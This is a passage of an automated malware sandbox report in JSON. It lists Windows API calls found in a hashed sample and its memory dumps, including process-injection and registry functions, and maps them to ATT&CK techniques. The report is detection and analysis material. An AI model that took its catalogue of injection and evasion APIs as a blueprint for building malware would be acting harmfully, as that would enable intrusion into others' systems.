\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"SizeofResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"LocalAlloc\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"LockResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"ReadProcessMemory\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"RaiseException\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"lstrcmpiA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetExitCodeThread\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetVersion\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"FreeResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"LocalFree\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"LoadResource\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CreateEventA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"FindClose\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"TlsGetValue\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"TlsSetValue\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"FindResourceA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"SysReAllocStringLen\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"SysFreeString\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"SysAllocStringLen\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CharLowerA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"DispatchMessageA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"TranslateMessage\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CharNextA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"PeekMessageA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"MsgWaitForMultipleObjects\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"PostQuitMessage\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"FindWindowA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CharUpperA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetKeyboardType\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Sleep\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"ExitThread\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Heap32ListFirst\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Heap32ListNext\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Heap32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Heap32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Toolhelp32ReadProcessMemory\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Process32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Process32FirstW\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Process32NextW\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Thread32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Thread32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Module32First\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Module32Next\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Module32FirstW\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Module32NextW\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"GetModuleFileNameExA\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"IsDebuggerPresent\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExitThread\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Heap32ListFirst\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Heap32ListNext\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Heap32First\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Heap32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Toolhelp32ReadProcessMemory\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Process32FirstW\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Process32NextW\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Thread32First\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Thread32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Module32First\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Module32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Module32FirstW\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"Module32NextW\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameExA\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"IsDebuggerPresent\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyA\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"BitBlt\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"WNetOpenEnumA\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"ZwSetInformationProcess\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"CoTaskMemFree\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"SysFreeString\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"SHGetFileInfoA\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetDC\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"VerQueryValueA\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"FtpOpenFileA\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"LocalFree\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"LocalAlloc\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetVersion\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetThreadLocale\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RaiseException\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardType\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CharNextA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"SysReAllocStringLen\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"SysAllocStringLen\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsSetValue\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsGetValue\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegDeleteKeyA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetUserNameA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"WriteProcessMemory\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualAllocEx\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"SizeofResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReadProcessMemory\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"LockResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetExitCodeThread\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"FreeResource\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindResourceA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateRemoteThread\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"TranslateMessage\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"PostQuitMessage\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"PeekMessageA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"MsgWaitForMultipleObjects\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindWindowA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"DispatchMessageA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CharLowerA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")\n Found reference to API (Indicator: \"CharUpperA\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"SELECT * FROM k$\" (Source: 00000000-00004288.00000000.92877.01488000.00000004.mdmp, Indicator: \"select * from k$\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70b00000\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" loaded module \"KERNEL32\" at base 751c0000\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" 